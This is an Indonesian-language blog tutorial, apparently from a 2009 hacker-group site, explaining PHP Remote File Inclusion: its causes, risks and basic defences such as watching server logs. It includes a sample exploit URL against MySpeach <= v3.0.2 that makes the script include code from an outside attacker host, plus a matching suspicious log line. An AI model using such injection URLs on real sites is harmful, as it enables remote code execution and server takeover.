Remote File Include (RFI)

Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

Dalam artikel ini kita akan lebih banyak membahas bagaimana proses
file inclusion (yang selanjutnya kita sebut dengan istilah `injeksi')
bisa terjadi dalam bahasa PHP.

° BAGAIMANA BISA TERJADI?
———————–

Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri
dari:

1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)

Variabel dalam PHP mempunyai sintaks:

#1 include ($namavariable. "/file…")
#2 require_once ($namavariable. /file…)
#3 include_once ($variable. /file…)

Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya
terdapat variabel seperti ini:


include($my_ms["root"].'/error.php');


Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:

http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

2. Setting dalam file PHP.ini

#1. register_globals=On
#2. magic_quotes=off
#3. allow_fopenurl=on

° BERBAHAYAKAH?
-------------

File inclusion memiliki level resiko tinggi (High Risk) bahkan level
sangat berbahaya (Very Dangerous) karena injeksi memperkenankan
pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server. Tindakan ini sangat membahayakan
bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses
lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa
saja pelaku mendapatkan akses administrator atau root.

Secara garis besar resiko serangan ini adalah:

1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering a.k.a pencurian data (such as credentials information,
credit cards, etc..)
5. Dan banyak lagi...!!! Termasuk tindakan pengambilalihan server dan
ddos!

° SISTEM OPERASI APA YANG KEBAL?
------------------------------

Saya teringat permainan C&C Generals (my fave game!) saat seorang
hacker keluar dari barak. Mereka mengucapkan "NO SYSTEMS IS SAFE!".
Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi
selama mereka menggunakan server side scripting yang dapat
dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX,
FreeBSD, Solaris, Darwin OS, dan lain-lainnya.

° APA YANG HARUS DILAKUKAN?
-------------------------

Banyak sekali portal dan komunitas white hat yang sering merilis bugs
terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan
perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit
perbaikan yang berarti terhadap CMS yang mungkin sekarang anda
gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan
hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET
/index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga,
karena bisa saja ini serangan terhadap web atau portal yang anda kelola.

Salah satu tehnik paling aman bagi seorang administrator adalah selalu
memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Gunakan firewall guna mencegah penyusupan orang-orang yang tidak
bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.

° ENDING
------

Artikel ini saya tulis berdasarkan apa yang saya ketahui, dan jika
terdapat kesalahan karena ketidaktahuan saya anda dapat menghubungi
saya lewat email. Pengalaman adalah guru yang terbaik untuk kita
semua. Semua bisa saja terjadi karena tidak ada pribadi yang
diciptakan sempurna. Nobody is perfect! No systems is safe!

° REFERENSI
---------

- http://net-square.com/papers/one_way/one_way.html (Very simple
haxing guides)
- www.milw0rm.com (Nice place to looking for exploits and buggy things)
- http://www.packetstormsecurity.org (Great advisory, toolz, and
exploits archives)
- www.google.com (Greatest place to ask! )
- http://www.ultrapasswords.com/ (Place to cooling down... We love
streaming vids! Yeah!)
 
KiLL-9 CrEW Copyright © 2009 KiLL-9 CrEw Template Designed by Arianom Founder KilLL-9 CrEw Best Indonesian White Hacker. Allright Reserved.